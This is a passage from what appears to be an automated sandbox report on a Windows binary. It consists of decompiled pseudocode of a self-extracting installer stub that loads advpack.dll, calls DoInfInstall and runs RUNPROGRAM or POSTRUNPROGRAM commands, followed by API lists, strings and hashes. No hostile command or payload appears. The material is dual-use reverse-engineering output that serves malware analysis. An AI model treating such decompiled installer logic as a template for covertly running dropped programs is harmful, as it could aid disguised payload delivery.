                                                                                                                                                                                                                                              												_t79 = E00973FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                              												__eflags = _t79;
                                                                                                                                                                                                                                              												if(_t79 == 0) {
                                                                                                                                                                                                                                              													L61:
                                                                                                                                                                                                                                              													LocalFree(_t151);
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                              												LocalFree(_t151);
                                                                                                                                                                                                                                              												_t127 = _t127 + 1;
                                                                                                                                                                                                                                              												_v396 = _t127;
                                                                                                                                                                                                                                              												__eflags = _t127 - 2;
                                                                                                                                                                                                                                              												if(_t127 >= 2) {
                                                                                                                                                                                                                                              													_t155 = 1;
                                                                                                                                                                                                                                              													__eflags = 1;
                                                                                                                                                                                                                                              													L69:
                                                                                                                                                                                                                                              													__eflags =  *0x978580;
                                                                                                                                                                                                                                              													if( *0x978580 != 0) {
                                                                                                                                                                                                                                              														E00972267();
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													_t77 = _t155;
                                                                                                                                                                                                                                              													goto L63;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t153 = _v392;
                                                                                                                                                                                                                                              												_t149 = _v388;
                                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											L38:
                                                                                                                                                                                                                                              											__eflags =  *0x978180;
                                                                                                                                                                                                                                              											if( *0x978180 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c7;
                                                                                                                                                                                                                                              												E009744B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              												LocalFree(_v424);
                                                                                                                                                                                                                                              												 *0x979124 = 0x8007042b;
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x979a34 & 0x00000004;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t129 = E00976495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                              											__eflags = _t129;
                                                                                                                                                                                                                                              											if(_t129 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c8;
                                                                                                                                                                                                                                              												E009744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                              												L65:
                                                                                                                                                                                                                                              												LocalFree(_v408);
                                                                                                                                                                                                                                              												 *0x979124 = E00976285();
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                              											_v404 = _t146;
                                                                                                                                                                                                                                              											__eflags = _t146;
                                                                                                                                                                                                                                              											if(_t146 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c9;
                                                                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                                                                              												E009744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                              												FreeLibrary(_t129);
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x978a30;
                                                                                                                                                                                                                                              											_t151 = _v408;
                                                                                                                                                                                                                                              											_v384 = 0;
                                                                                                                                                                                                                                              											_v368 =  &_v280;
                                                                                                                                                                                                                                              											_t96 =  *0x979a40; // 0x3
                                                                                                                                                                                                                                              											_v364 = _t96;
                                                                                                                                                                                                                                              											_t97 =  *0x978a38 & 0x0000ffff;
                                                                                                                                                                                                                                              											_v380 = 0x979154;
                                                                                                                                                                                                                                              											_v376 = _t151;
                                                                                                                                                                                                                                              											_v372 = 0x9791e4;
                                                                                                                                                                                                                                              											_v360 = _t97;
                                                                                                                                                                                                                                              											if( *0x978a30 != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t144 =  *0x979a34; // 0x1
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t145 =  *0x978d48; // 0x0
                                                                                                                                                                                                                                              											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                              											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t145;
                                                                                                                                                                                                                                              											if(_t145 < 0) {
                                                                                                                                                                                                                                              												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                              												__eflags = _t104;
                                                                                                                                                                                                                                              												_v360 = _t104;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t98 =  *0x979a38; // 0x0
                                                                                                                                                                                                                                              											_v356 = _t98;
                                                                                                                                                                                                                                              											_t130 = _t146;
                                                                                                                                                                                                                                              											 *0x97a288( &_v384);
                                                                                                                                                                                                                                              											_t101 = _v404();
                                                                                                                                                                                                                                              											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                              											if(_t164 != _t164) {
                                                                                                                                                                                                                                              												_t130 = 4;
                                                                                                                                                                                                                                              												asm("int 0x29");
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											 *0x979124 = _t101;
                                                                                                                                                                                                                                              											_push(_t129);
                                                                                                                                                                                                                                              											__eflags = _t101;
                                                                                                                                                                                                                                              											if(_t101 < 0) {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												_t127 = _v400;
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0x979a40 - 1; // 0x3
                                                                                                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0x978a20;
                                                                                                                                                                                                                                              										if( *0x978a20 == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t157;
                                                                                                                                                                                                                                              										if(_t157 != 0) {
                                                                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              										E0097202A(_t146); // executed
                                                                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v280;
                                                                                                                                                                                                                                              									_t108 = E0097468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                              									__eflags = _t108;
                                                                                                                                                                                                                                              									if(_t108 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x978c42;
                                                                                                                                                                                                                                              									if( *0x978c42 != 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                              									__eflags = _t112 == 0;
                                                                                                                                                                                                                                              									if(_t112 == 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t118 =  *0x978a38; // 0x0
                                                                                                                                                                                                                                              								if(_t118 == 0) {
                                                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                                                              									if(_t153 != 0) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E0097468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                              										goto L27;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                              									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              										goto L62;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "USRQCMD";
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E0097468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                              										_t153 = 1;
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L26:
                                                                                                                                                                                                                                              						_push(_t130);
                                                                                                                                                                                                                                              						_t146 = 0x104;
                                                                                                                                                                                                                                              						E00971781( &_v276, 0x104, _t130, 0x978c42);
                                                                                                                                                                                                                                              						goto L27;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t130 = "REBOOT";
                                                                                                                                                                                                                                              				_t125 = E0097468F(_t130, 0x979a2c, 4);
                                                                                                                                                                                                                                              				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                              					goto L25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





























































                                                                                                                                                                                                                                              0x00973baa
                                                                                                                                                                                                                                              0x00973bb0
                                                                                                                                                                                                                                              0x00973bb7
                                                                                                                                                                                                                                              0x00973bc0
                                                                                                                                                                                                                                              0x00973bc2
                                                                                                                                                                                                                                              0x00973bc9
                                                                                                                                                                                                                                              0x00973bcb
                                                                                                                                                                                                                                              0x00973bcf
                                                                                                                                                                                                                                              0x00973bd3
                                                                                                                                                                                                                                              0x00973bd9
                                                                                                                                                                                                                                              0x00973bfd
                                                                                                                                                                                                                                              0x00973bfd
                                                                                                                                                                                                                                              0x00973bff
                                                                                                                                                                                                                                              0x00973c03
                                                                                                                                                                                                                                              0x00973c03
                                                                                                                                                                                                                                              0x00973c11
                                                                                                                                                                                                                                              0x00973c16
                                                                                                                                                                                                                                              0x00973c19
                                                                                                                                                                                                                                              0x00973c28
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973c30
                                                                                                                                                                                                                                              0x00973c39
                                                                                                                                                                                                                                              0x00973c40
                                                                                                                                                                                                                                              0x00973d13
                                                                                                                                                                                                                                              0x00973d15
                                                                                                                                                                                                                                              0x00973d21
                                                                                                                                                                                                                                              0x00973d26
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973c4f
                                                                                                                                                                                                                                              0x00973c56
                                                                                                                                                                                                                                              0x00973c60
                                                                                                                                                                                                                                              0x00973c65
                                                                                                                                                                                                                                              0x00973c77
                                                                                                                                                                                                                                              0x00973c78
                                                                                                                                                                                                                                              0x00973c7c
                                                                                                                                                                                                                                              0x00973c7e
                                                                                                                                                                                                                                              0x00973c82
                                                                                                                                                                                                                                              0x00973c82
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973c7c
                                                                                                                                                                                                                                              0x00973c67
                                                                                                                                                                                                                                              0x00973c69
                                                                                                                                                                                                                                              0x00973c6d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973c58
                                                                                                                                                                                                                                              0x00973c58
                                                                                                                                                                                                                                              0x00973c6e
                                                                                                                                                                                                                                              0x00973c6e
                                                                                                                                                                                                                                              0x00973c87
                                                                                                                                                                                                                                              0x00973c89
                                                                                                                                                                                                                                              0x00973d4d
                                                                                                                                                                                                                                              0x00973d4f
                                                                                                                                                                                                                                              0x00973d50
                                                                                                                                                                                                                                              0x00973d52
                                                                                                                                                                                                                                              0x00973d9e
                                                                                                                                                                                                                                              0x00973da8
                                                                                                                                                                                                                                              0x00973daf
                                                                                                                                                                                                                                              0x00973db4
                                                                                                                                                                                                                                              0x00973db6
                                                                                                                                                                                                                                              0x00973f4d
                                                                                                                                                                                                                                              0x00973f4d
                                                                                                                                                                                                                                              0x00973f4f
                                                                                                                                                                                                                                              0x00973f56
                                                                                                                                                                                                                                              0x00973f57
                                                                                                                                                                                                                                              0x00973f58
                                                                                                                                                                                                                                              0x00973f63
                                                                                                                                                                                                                                              0x00973f63
                                                                                                                                                                                                                                              0x00973dbc
                                                                                                                                                                                                                                              0x00973dc0
                                                                                                                                                                                                                                              0x00973dc2
                                                                                                                                                                                                                                              0x00973de6
                                                                                                                                                                                                                                              0x00973de6
                                                                                                                                                                                                                                              0x00973de8
                                                                                                                                                                                                                                              0x00973f0b
                                                                                                                                                                                                                                              0x00973f0b
                                                                                                                                                                                                                                              0x00973f0f
                                                                                                                                                                                                                                              0x00973f13
                                                                                                                                                                                                                                              0x00973f15
                                                                                                                                                                                                                                              0x00973f1a
                                                                                                                                                                                                                                              0x00973f1c
                                                                                                                                                                                                                                              0x00973f46
                                                                                                                                                                                                                                              0x00973f47
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f47
                                                                                                                                                                                                                                              0x00973f1e
                                                                                                                                                                                                                                              0x00973f1f
                                                                                                                                                                                                                                              0x00973f25
                                                                                                                                                                                                                                              0x00973f26
                                                                                                                                                                                                                                              0x00973f2a
                                                                                                                                                                                                                                              0x00973f2d
                                                                                                                                                                                                                                              0x00973fd9
                                                                                                                                                                                                                                              0x00973fd9
                                                                                                                                                                                                                                              0x00973fda
                                                                                                                                                                                                                                              0x00973fda
                                                                                                                                                                                                                                              0x00973fe1
                                                                                                                                                                                                                                              0x00973fe3
                                                                                                                                                                                                                                              0x00973fe3
                                                                                                                                                                                                                                              0x00973fe8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973fe8
                                                                                                                                                                                                                                              0x00973f33
                                                                                                                                                                                                                                              0x00973f37
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f37
                                                                                                                                                                                                                                              0x00973dee
                                                                                                                                                                                                                                              0x00973dee
                                                                                                                                                                                                                                              0x00973df5
                                                                                                                                                                                                                                              0x00973fad
                                                                                                                                                                                                                                              0x00973fb9
                                                                                                                                                                                                                                              0x00973fc2
                                                                                                                                                                                                                                              0x00973fc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973fc8
                                                                                                                                                                                                                                              0x00973dfb
                                                                                                                                                                                                                                              0x00973dfd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973e03
                                                                                                                                                                                                                                              0x00973e0a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973e15
                                                                                                                                                                                                                                              0x00973e17
                                                                                                                                                                                                                                              0x00973e19
                                                                                                                                                                                                                                              0x00973f94
                                                                                                                                                                                                                                              0x00973fa4
                                                                                                                                                                                                                                              0x00973f7c
                                                                                                                                                                                                                                              0x00973f80
                                                                                                                                                                                                                                              0x00973f8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f8b
                                                                                                                                                                                                                                              0x00973e2c
                                                                                                                                                                                                                                              0x00973e30
                                                                                                                                                                                                                                              0x00973e34
                                                                                                                                                                                                                                              0x00973e36
                                                                                                                                                                                                                                              0x00973f69
                                                                                                                                                                                                                                              0x00973f6e
                                                                                                                                                                                                                                              0x00973f70
                                                                                                                                                                                                                                              0x00973f76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f76
                                                                                                                                                                                                                                              0x00973e3c
                                                                                                                                                                                                                                              0x00973e43
                                                                                                                                                                                                                                              0x00973e47
                                                                                                                                                                                                                                              0x00973e52
                                                                                                                                                                                                                                              0x00973e56
                                                                                                                                                                                                                                              0x00973e5c
                                                                                                                                                                                                                                              0x00973e61
                                                                                                                                                                                                                                              0x00973e68
                                                                                                                                                                                                                                              0x00973e70
                                                                                                                                                                                                                                              0x00973e74
                                                                                                                                                                                                                                              0x00973e7c
                                                                                                                                                                                                                                              0x00973e80
                                                                                                                                                                                                                                              0x00973e82
                                                                                                                                                                                                                                              0x00973e82
                                                                                                                                                                                                                                              0x00973e87
                                                                                                                                                                                                                                              0x00973e87
                                                                                                                                                                                                                                              0x00973e8b
                                                                                                                                                                                                                                              0x00973e91
                                                                                                                                                                                                                                              0x00973e94
                                                                                                                                                                                                                                              0x00973e96
                                                                                                                                                                                                                                              0x00973e96
                                                                                                                                                                                                                                              0x00973e9b
                                                                                                                                                                                                                                              0x00973e9b
                                                                                                                                                                                                                                              0x00973e9f
                                                                                                                                                                                                                                              0x00973ea2
                                                                                                                                                                                                                                              0x00973ea4
                                                                                                                                                                                                                                              0x00973ea4
                                                                                                                                                                                                                                              0x00973ea9
                                                                                                                                                                                                                                              0x00973ea9
                                                                                                                                                                                                                                              0x00973ead
                                                                                                                                                                                                                                              0x00973eb3
                                                                                                                                                                                                                                              0x00973eb6
                                                                                                                                                                                                                                              0x00973eb8
                                                                                                                                                                                                                                              0x00973eb8
                                                                                                                                                                                                                                              0x00973ebd
                                                                                                                                                                                                                                              0x00973ebd
                                                                                                                                                                                                                                              0x00973ec1
                                                                                                                                                                                                                                              0x00973ec3
                                                                                                                                                                                                                                              0x00973ec5
                                                                                                                                                                                                                                              0x00973ec5
                                                                                                                                                                                                                                              0x00973eca
                                                                                                                                                                                                                                              0x00973eca
                                                                                                                                                                                                                                              0x00973ece
                                                                                                                                                                                                                                              0x00973ed5
                                                                                                                                                                                                                                              0x00973ed9
                                                                                                                                                                                                                                              0x00973ee0
                                                                                                                                                                                                                                              0x00973ee6
                                                                                                                                                                                                                                              0x00973eea
                                                                                                                                                                                                                                              0x00973eec
                                                                                                                                                                                                                                              0x00973eee
                                                                                                                                                                                                                                              0x00973ef3
                                                                                                                                                                                                                                              0x00973ef3
                                                                                                                                                                                                                                              0x00973ef5
                                                                                                                                                                                                                                              0x00973efa
                                                                                                                                                                                                                                              0x00973efb
                                                                                                                                                                                                                                              0x00973efd
                                                                                                                                                                                                                                              0x00973f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973eff
                                                                                                                                                                                                                                              0x00973eff
                                                                                                                                                                                                                                              0x00973f05
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973f05
                                                                                                                                                                                                                                              0x00973efd
                                                                                                                                                                                                                                              0x00973dc7
                                                                                                                                                                                                                                              0x00973dce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973dd0
                                                                                                                                                                                                                                              0x00973dd7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973dd9
                                                                                                                                                                                                                                              0x00973ddb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973ddd
                                                                                                                                                                                                                                              0x00973de1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973de1
                                                                                                                                                                                                                                              0x00973d59
                                                                                                                                                                                                                                              0x00973d65
                                                                                                                                                                                                                                              0x00973d6a
                                                                                                                                                                                                                                              0x00973d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973d6e
                                                                                                                                                                                                                                              0x00973d75
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973d8f
                                                                                                                                                                                                                                              0x00973d96
                                                                                                                                                                                                                                              0x00973d98
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973d98
                                                                                                                                                                                                                                              0x00973c8f
                                                                                                                                                                                                                                              0x00973c98
                                                                                                                                                                                                                                              0x00973cf1
                                                                                                                                                                                                                                              0x00973cf3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973cfe
                                                                                                                                                                                                                                              0x00973d11
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973d11
                                                                                                                                                                                                                                              0x00973c9c
                                                                                                                                                                                                                                              0x00973ca5
                                                                                                                                                                                                                                              0x00973ca7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973cad
                                                                                                                                                                                                                                              0x00973cb2
                                                                                                                                                                                                                                              0x00973cb7
                                                                                                                                                                                                                                              0x00973cc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973ce8
                                                                                                                                                                                                                                              0x00973cec
                                                                                                                                                                                                                                              0x00973ced
                                                                                                                                                                                                                                              0x00973ced
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973ce8
                                                                                                                                                                                                                                              0x00973c9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973c9e
                                                                                                                                                                                                                                              0x00973c56
                                                                                                                                                                                                                                              0x00973d35
                                                                                                                                                                                                                                              0x00973d35
                                                                                                                                                                                                                                              0x00973d3c
                                                                                                                                                                                                                                              0x00973d48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973d48
                                                                                                                                                                                                                                              0x00973c03
                                                                                                                                                                                                                                              0x00973be2
                                                                                                                                                                                                                                              0x00973be7
                                                                                                                                                                                                                                              0x00973bee
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00973C11
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00973CDC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00978C42), ref: 00973D8F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00973E26
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00978C42), ref: 00973EFF
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00978C42), ref: 00973F1F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00978C42), ref: 00973F40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00978C42), ref: 00973F47
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00978C42), ref: 00973F76
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00978C42), ref: 00973F80
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00978C42), ref: 00973FC2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                              • API String ID: 1032054927-3356413666
                                                                                                                                                                                                                                              • Opcode ID: 80cf3313ba597767600a0515ad3bc23ff8c534807eb06a60f59836edc7801592
                                                                                                                                                                                                                                              • Instruction ID: e14542c8ad6cd87d59ef301a56590df8362c8cfda62ebae8107b1f10072763d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80cf3313ba597767600a0515ad3bc23ff8c534807eb06a60f59836edc7801592
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81B101736183019BE330DF248845B6B76E8EBC5740F10C92AFA9DD21E1DB74CA84EB56
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
